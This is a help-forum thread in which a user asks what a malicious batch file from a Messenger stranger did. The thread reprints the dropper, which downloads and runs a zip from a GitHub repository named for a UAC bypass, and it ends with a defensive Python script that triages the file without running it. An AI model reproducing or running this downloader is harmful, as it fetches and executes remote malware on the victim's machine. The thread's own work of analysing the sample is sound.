
Got a zipped archive from a stranger over FB Messenger, containing a file named 'Poor quality item-a4UEBzN0Tg45RTzLA100-22100-10955.bat'. My bad that I double-clicked the file from inside the zipped archive without thinking. As it happened, it promptly ran some code in a Windows command window and disappeared in a flash. I could just make out some words like 'github' and 'delete'.

Can someone pls help tell me what these commands do? And from which portion of these commands can I learn what they did to my PC?

@echo off
cls
set url=https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4khanhhieu2.zip
set ZIP_PATH=C:\Users\Public
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"
call ""%DESTINATION_FOLDER%\vn.cmd"
del "%DESTINATION_FODLER%\vn.cmd"
exit
Bathinda Helper
  • It attempted to download a file from `https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4khanhhieu2.zip` which appears to now be deleted. What that file did is anyone's guess. It could be that when you ran the script the file had already been removed, in which case you would be fine, but we have no idea other than that. Scan your system. – Mokubai Aug 22 '23 at 09:22
  • The file exploited a 0-day exploit in a specific Windows DLL. What else the script did is anyone's guess. **Don't open random files from strangers on Facebook.** The exploit was easily researched. – Ramhound Aug 22 '23 at 09:39
  • Thank you. Pls tell, if I ran the 3rd line (beginning with 'set url'), the 4th line starting with 'curl...' and the 5th line starting with 'powershell...', would the file be downloaded to my PC at C:\Users\Public, so that this way I could see what the contents of that file were? Thanks again. Note: I know basic terminal commands. – Bathinda Helper Aug 23 '23 at 10:00
  • @BathindaHelper - The URL currently is dead. Impossible to do post analysis on the script for that reason. It's dead due to the fact it was malicious. Whether you were vulnerable to the exploits is impossible to determine, based on the information provided. Additionally, the question is closed, so submitting an analysis is impossible even if it were possible to perform. So, no, I won't do any analysis. – Ramhound Aug 23 '23 at 10:06
  • Ok. Thanks. That's enough information to give me some peace. I'd be much, much more careful in future. Thanks. – Bathinda Helper Aug 23 '23 at 14:37
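As an added example, not from anyone in the thread, here is a static triage of the batch file pasted in the question: it replays the `set` assignments the way cmd.exe expands `%VAR%` (variable names are case-insensitive), then reports which lines reach the network, execute something or delete files, and which variable names the script references but never defines. It never runs the script, and the list of command verbs it flags is my own assumption, not an exhaustive one.

```python
import re

# The batch file pasted in the question, copied verbatim and treated purely as data.
SCRIPT = r"""@echo off
cls
set url=https://github.com/xjnhzaj12b1/iscsicpl_bypassUAC/raw/main/4khanhhieu2.zip
set ZIP_PATH=C:\Users\Public
curl -L -o "%ZIP_PATH%" "%URL%"
powershell -command "Expand-Archive -LiteralPath '%ZIP_PATH%' -DestinationPath '%DESTINATION_FOLDER%'"
del "%ZIP_PATH%"
call ""%DESTINATION_FOLDER%\vn.cmd"
del "%DESTINATION_FODLER%\vn.cmd"
exit
"""
# Command verbs worth flagging (assumed, not exhaustive), grouped by effect on the machine.
CATEGORIES = {
    "network": ("curl", "bitsadmin", "certutil"),
    "execute": ("powershell", "call", "start", "wscript", "cscript", "mshta"),
    "delete": ("del", "erase", "rmdir", "rd"),
}
VAR_RE = re.compile(r"%([^%\s]+)%")
SET_RE = re.compile(r"set\s+([^=]+)=(.*)", re.I)
URL_RE = re.compile(r"""https?://[^\s"']+""")

def triage(script: str) -> dict:
    """Statically walk a .bat: record `set` vars, expand %VAR% as cmd does (case-insensitive), classify."""
    env, findings, undefined = {}, [], set()
    def expand(m):                      # re.sub callback; unknown names are left visible as-is
        key = m.group(1).lower()
        if key not in env:
            undefined.add(m.group(1))
            return m.group(0)
        return env[key]
    for lineno, raw in enumerate(script.splitlines(), 1):
        line = raw.strip()
        if not line or line.lower().startswith(("@echo", "rem", "::")):
            continue
        if m := SET_RE.match(line):     # remember the assignment, cmd keys are case-insensitive
            env[m.group(1).strip().lower()] = m.group(2).strip()
            continue
        verb = line.split()[0].lower()
        for cat, verbs in CATEGORIES.items():
            if verb in verbs:
                findings.append({"line": lineno, "category": cat, "command": VAR_RE.sub(expand, line)})
    urls = sorted({u for f in findings for u in URL_RE.findall(f["command"])})
    return {"variables": env, "findings": findings, "undefined": sorted(undefined), "urls": urls}

if __name__ == "__main__":
    for f in triage(SCRIPT)["findings"]:
        print(f"line {f['line']:>2} [{f['category']}] {f['command']}")
```

The report shows the download target, the archive expansion, one `call` and two deletions, plus the two `DESTINATION_*` names that are never set; that is the part of the question that can be answered from the launcher alone. What the downloaded archive contained depends on the remote file, which reading the launcher cannot tell you.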

0 Answers